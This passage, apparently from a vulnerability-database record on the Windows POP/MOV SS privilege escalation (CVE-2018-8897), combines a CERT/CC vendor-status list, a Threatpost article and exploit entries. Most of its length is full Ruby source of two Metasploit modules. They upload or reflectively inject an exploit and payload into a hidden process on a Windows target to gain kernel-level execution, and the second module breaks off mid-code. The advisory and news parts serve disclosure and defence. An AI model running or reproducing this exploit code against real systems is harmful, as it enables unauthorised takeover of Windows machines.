Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NETSCOUT Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Netgear, Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nominum Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OmniTI Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenConnect Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenDNS 
Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Oracle Corporation Unknown\n\nNotified: May 01, 2018 Updated: May 07, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nOracle Solaris is not affected by `CVE-2018-8897`.\n\n### Peplink Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Philips Electronics Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### PowerDNS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QLogic Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QNX Software 
Systems Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quagga Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quantenna Communications Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ruckus Wireless Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SafeNet Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Samsung Mobile Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Secure64 Software Corporation Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor 
information regarding this vulnerability.\n\n### Sierra Wireless Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Snort Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Symantec Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TP-LINK Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TippingPoint Technologies Inc. 
Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TrueOS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubiquiti Networks Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Wind River Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Zebra Technologies Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### aep NETWORKS Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### 
dnsmasq Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### eCosCentric Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### m0n0wall Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### netsnmp Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### pfSENSE Unknown\n\nNotified: May 01, 2018 Updated: April 30, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P \nTemporal | 5.3 | E:POC/RL:OF/RC:C \nEnvironmental | 5.3 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://everdox.net/popss.pdf>\n * <http://cwe.mitre.org/data/definitions/703.html>\n\n### Acknowledgements\n\nMicrosoft and Intel credit Nick Peterson of [Everdox Tech, LLC](<https://www.linkedin.com/in/everdox>), for responsibly reporting this vulnerability and working with the group on coordinated 
disclosure. Andy Lutomirski is also credited for assistance in documenting the vulnerability for Linux.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2018-8897](<http://web.nvd.nist.gov/vuln/detail/CVE-2018-8897>) \n---|--- \n**Date Public:** | 2018-05-08 \n**Date First Published:** | 2018-05-08 \n**Date Last Updated:** | 2019-07-11 16:31 UTC \n**Document Revision:** | 107 \n", "modified": "2019-07-11T16:31:00", "published": "2018-05-08T00:00:00", "id": "VU:631579", "href": "https://www.kb.cert.org/vuls/id/631579", "type": "cert", "title": "Hardware debug exception documentation may result in unexpected behavior", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows - POPMOV SS Privilege Escalation", "edition": 1, "published": "2018-05-22T00:00:00", "title": "Microsoft Windows - POPMOV SS Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-05-22T00:00:00", "id": "EXPLOITPACK:F4489E070E6CDADA18DE546A030227F0", "href": "", "sourceData": "Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privileges.\n\n- KVA Shadowing should be disabled and the relevant security update should be uninstalled.\n- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44697.zip", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-04-25T05:49:58", "bulletinFamily": "info", "cvelist": ["CVE-2018-8897"], "description": "Multiple operating system vendors issued coordinated patches this week to address a common vulnerability across their platforms, which was introduced thanks to widespread misinterpretation of Intel 
developer documentation.\n\nAccording to the CERT/CC team, [most major players](<https://www.kb.cert.org/vuls/byvendor?searchview&Query=FIELD+Reference=631579&SearchOrder=4>) (including Apple, FreeBSD, Microsoft, Red Hat, Ubuntu, VMWare and Xen, plus distros based on the Linux Kernel OS) built an uncannily similar privilege escalation flaw into their Intel-based products.\n\nThe flaw isn\u2019t remotely exploitable \u2013 a bad actor would need to gain local access to the victim\u2019s machine via malware or stolen credentials. But once in, CERT/CC explained that an attacker armed with OS APIs could access sensitive memory information, and also \u201ccontrol low-level OS functions\u201d by gaining elevated access privileges to the kernel level \u2013 i.e., hijack the code that controls the PC, Mac or VM.\n\nFrom there, Microsoft [explained](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8897>), it\u2019s possible to install programs and malware; view, change or delete data; or create new accounts with full user rights.\n\nOn the more innocuous end of the threat-level spectrum, the issue can also simply crash the kernel by confusing the system, causing a denial-of-service state.\n\nOn the more technical front, the flaw ([CVE-2018-8897](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897>)) resides in a debug exception in the x86-64 architectures. 
To be clear, the issue doesn\u2019t exist in the chip itself, but rather in the way developers have built their software stacks to interact with the processor.\n\nAs Red Hat explained, modern processors provide debugging infrastructure, used by system designers and application developers to debug their software and monitor events, including memory access (read or write), instruction execution and I/O port access.\n\n\u201cWhen such an event occurs during program execution, the processor raises a Debug Exception (#DB) to transfer execution control to debugging software,\u201d the company said in its [overview](<https://access.redhat.com/security/vulnerabilities/pop_ss>) of the flaw. \u201cThis catches the debug exception and allows a developer to examine program execution state.\u201d\n\nDevelopers appear to have widely misunderstood the way Intel processors handle that exception, leading to the same issue popping up across the computing landscape.\n\n\u201cThe error appears to be due to developer interpretation of existing documentation for certain Intel architecture interrupt/exception instructions, namely MOV to SS and POP to SS,\u201d CERT/CC said.\n\nThe CERT/CC team explained the problem in an [advisory](<https://www.kb.cert.org/vuls/id/631579>): \u201cIn certain circumstances, after the use of certain Intel x86-64 architecture instructions, a debug exception pointing to data in a lower ring (for most operating systems, the kernel Ring 0 level) is made available to operating system components running in Ring 3.\u201d\n\nNick Peterson of Everdox Tech, who first uncovered the vulnerability, pointed the finger at what he said was Intel\u2019s lack of clarity in its instruction manual. 
In a [technical brief](<http://everdox.net/popss.pdf>), he noted, \u201cThis is a serious security vulnerability and oversight made by operating system vendors due to unclear and perhaps even incomplete documentation.\u201d\n\nWe reached out to Intel and received an official statement:\n\n_\u201cThe security of our customers and partners is important to us. To help ensure clear communication with the developer community, we are updating our [Software Developers Manual](<https://software.intel.com/en-us/articles/intel-sdm>) (SDM) with clarifying language on the secure use of the POP/MOV-SS instructions. We recommend that system software vendors evaluate their software to confirm their products handle the situations in question. More information is available [here](<https://www.kb.cert.org/vuls/id/631579>).\u201d_\n\nCreating secure computing environments obviously takes coordination between the chipmaker, software developers and vendors; however, there are always blind spots. In this case, once the chip is out the door, Intel has no visibility or control over how developers build software to use its silicon.\n", "modified": "2018-05-10T15:37:07", "published": "2018-05-10T15:37:07", "id": "THREATPOST:1C410BC5122B196A58BBDDCDA7A79983", "href": "https://threatpost.com/major-os-players-misinterpret-intel-docs-and-now-kernels-can-be-hijacked/131869/", "type": "threatpost", "title": "Major OS Players Misinterpret Intel Docs, and Now Kernels Can Be Hijacked", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2018-07-14T01:08:35", "description": "Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit). CVE-2018-8897. Local exploit for Windows platform. 
Tags: Metasploit Framework (MSF), L...", "published": "2018-07-13T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-07-13T00:00:00", "id": "EDB-ID:45024", "href": "https://www.exploit-db.com/exploits/45024/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/common'\r\nrequire 'msf/core/post/file'\r\nrequire 'msf/core/post/windows/priv'\r\nrequire 'msf/core/post/windows/registry'\r\nrequire 'msf/core/exploit/exe'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in a statement in the system programming guide\r\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\r\n in various operating system kernels, resulting in unexpected behavior for #DB\r\n exceptions that are deferred by MOV SS or POP SS.\r\n\r\n This module will upload the pre-compiled exploit and use it to execute the final\r\n payload in order to gain remote code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Nick Peterson', # Original discovery (@nickeverdox)\r\n 'Nemanja Mulasmajic', # Original discovery (@0xNemi)\r\n 'Can B\u00f6l\u00fck <can1357>', # PoC\r\n 'bwatters-r7' # msf module\r\n ],\r\n 'Platform' => [ 'win' ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'May 08 
2018',\r\n 'References' =>\r\n [\r\n ['CVE', '2018-8897'],\r\n ['EDB', '44697'],\r\n ['BID', '104071'],\r\n ['URL', 'https://github.com/can1357/CVE-2018-8897/'],\r\n ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'DisablePayloadHandler' => 'False'\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('EXPLOIT_NAME',\r\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\r\n OptString.new('PAYLOAD_NAME',\r\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\r\n OptString.new('PATH',\r\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\r\n OptInt.new('EXECUTE_DELAY',\r\n [false, 'The number of seconds to delay before executing the exploit', 3])\r\n ])\r\n end\r\n\r\n def setup\r\n super\r\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\r\n @payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i)\r\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\r\n @payload_path = \"#{temp_path}\\\\#{payload_name}\"\r\n @exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\r\n @payload_exe = generate_payload_exe\r\n end\r\n\r\n def validate_active_host\r\n begin\r\n host = session.session_host\r\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n raise Msf::Exploit::Failed, 'Could not connect to session'\r\n end\r\n end\r\n\r\n def validate_remote_path(path)\r\n unless directory?(path)\r\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\r\n end\r\n 
end\r\n\r\n def validate_target\r\n if sysinfo['Architecture'] == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\r\n end\r\n if sysinfo['OS'] =~ /XP/\r\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\r\n end\r\n end\r\n\r\n def ensure_clean_destination(path)\r\n if file?(path)\r\n print_status(\"#{path} already exists on the target. Deleting...\")\r\n begin\r\n file_rm(path)\r\n print_status(\"Deleted #{path}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(\"Unable to delete #{path}\")\r\n end\r\n end\r\n end\r\n\r\n def ensure_clean_exploit_destination\r\n ensure_clean_destination(exploit_path)\r\n end\r\n\r\n def ensure_clean_payload_destination\r\n ensure_clean_destination(payload_path)\r\n end\r\n\r\n def upload_exploit\r\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')\r\n upload_file(exploit_path, local_exploit_path)\r\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\r\n end\r\n\r\n def upload_payload\r\n write_file(payload_path, payload_exe)\r\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\r\n end\r\n\r\n def execute_exploit\r\n sleep(datastore['EXECUTE_DELAY'])\r\n print_status(\"Running exploit #{exploit_path} with payload #{payload_path}\")\r\n output = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\")\r\n vprint_status(output)\r\n end\r\n\r\n def exploit\r\n begin\r\n validate_active_host\r\n validate_target\r\n validate_remote_path(temp_path)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n upload_exploit\r\n upload_payload\r\n execute_exploit\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(e.message)\r\n 
ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n end\r\n end\r\n\r\n attr_reader :exploit_name\r\n attr_reader :payload_name\r\n attr_reader :payload_exe\r\n attr_reader :temp_path\r\n attr_reader :payload_path\r\n attr_reader :exploit_path\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45024/"}, {"lastseen": "2018-05-24T14:24:06", "description": "Microsoft Windows - 'POP/MOV SS' Privilege Escalation. CVE-2018-8897. Local exploit for Windows platform", "published": "2018-05-22T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'POP/MOV SS' Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-05-22T00:00:00", "id": "EDB-ID:44697", "href": "https://www.exploit-db.com/exploits/44697/", "sourceData": "Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.\r\n\r\n- KVA Shadowing should be disabled and the relevant security update should be uninstalled.\r\n- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44697.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44697/"}], "metasploit": [{"lastseen": "2020-10-14T19:55:30", "description": "This module exploits a vulnerability in a statement in the system programming guide of the Intel 64 and IA-32 architectures software developer's manual being mishandled in various operating system kerneles, resulting in unexpected behavior for #DB excpetions that are deferred by MOV SS or POP SS. 
This module will upload the pre-compiled exploit and use it to execute the final payload in order to gain remote code execution.\n", "published": "2018-07-13T06:11:37", "type": "metasploit", "title": "Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MOV_SS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/common'\nrequire 'msf/core/post/file'\nrequire 'msf/core/post/windows/priv'\nrequire 'msf/core/post/windows/registry'\nrequire 'msf/core/exploit/exe'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::Common\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Exploit::EXE\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',\n 'Description' => %q(\n This module exploits a vulnerability in a statement in the system programming guide\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\n in various operating system kerneles, resulting in unexpected behavior for #DB\n excpetions that are deferred by MOV SS or POP SS.\n\n This module will upload the pre-compiled exploit and use it to execute the final\n payload in order to gain remote code execution.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Nick Peterson', # Original discovery (@nickeverdox)\n 'Nemanja Mulasmajic', # Original discovery (@0xNemi)\n 'Can B\u00f6l\u00fck <can1357>', # PoC\n 'bwatters-r7' # msf module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Targets' =>\n [\n ['Windows x64', { 'Arch' => ARCH_X64 }]\n ],\n 'DefaultTarget' => 0,\n 
'DisclosureDate' => '2018-05-08',\n 'References' =>\n [\n ['CVE', '2018-8897'],\n ['EDB', '44697'],\n ['BID', '104071'],\n ['URL', 'https://github.com/can1357/CVE-2018-8897/'],\n ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']\n ],\n 'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => false\n }\n ))\n\n register_options([\n OptBool.new('USE_INJECTION',\n [true, 'Use in-memory dll injection rather than exe file uploads.', true]),\n OptString.new('EXPLOIT_NAME',\n [false, 'The filename to use for the exploit binary if USE_INJECTION=false (%RAND% by default).', nil]),\n OptString.new('PAYLOAD_NAME',\n [false, 'The filename for the payload to be used on the target host if USE_INJECTION=false (%RAND%.exe by default).', nil]),\n OptString.new('PATH',\n [false, 'Path to write binaries if if USE_INJECTION=false(%TEMP% by default).', nil]),\n OptInt.new('EXECUTE_DELAY',\n [false, 'The number of seconds to delay before executing the exploit if USE_INJECTION=false', 3])\n ])\n end\n\n def setup_process\n begin\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. 
Trying to elevate the current process...')\n process = client.sys.process.open\n end\n process\n end\n\n def setup\n super\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))\n @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\n @payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i)\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\n @payload_path = \"#{temp_path}\\\\#{payload_name}\"\n @exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\n @payload_exe = generate_payload_exe\n end\n\n def inject_magic(process)\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897', 'reflective_dll.x64.dll')\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n dll = ''\n ::File.open(library_path, 'rb') { |f| dll = f.read }\n\n exploit_mem, offset = inject_dll_data_into_process(process, dll)\n\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n payload_mem = inject_into_process(process, payload.encoded)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. 
Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n end\n\n def validate_active_host\n begin\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n raise Msf::Exploit::Failed, 'Could not connect to session'\n end\n end\n\n def validate_remote_path(path)\n unless directory?(path)\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\n end\n end\n\n def validate_target\n if sysinfo['Architecture'] == ARCH_X86\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\n end\n if sysinfo['OS'] =~ /XP/\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\n end\n end\n\n def ensure_clean_destination(path)\n if file?(path)\n print_status(\"#{path} already exists on the target. Deleting...\")\n begin\n file_rm(path)\n print_status(\"Deleted #{path}\")\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(e)\n print_error(\"Unable to delete #{path}\")\n end\n end\n end\n\n def ensure_clean_exploit_destination\n ensure_clean_destination(exploit_path)\n end\n\n def ensure_clean_payload_destination\n ensure_clean_destination(payload_path)\n end\n\n def upload_exploit\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897', 'cve-2018-8897-exe.exe')\n upload_file(exploit_path, local_exploit_path)\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\n end\n\n def upload_payload\n write_file(payload_path, payload_exe)\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\n end\n\n def execute_exploit\n sleep(datastore['EXECUTE_DELAY'])\n print_status(\"Running exploit #{exploit_path} with payload #{payload_path}\")\n output = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\")\n vprint_status(output)\n end\n\n 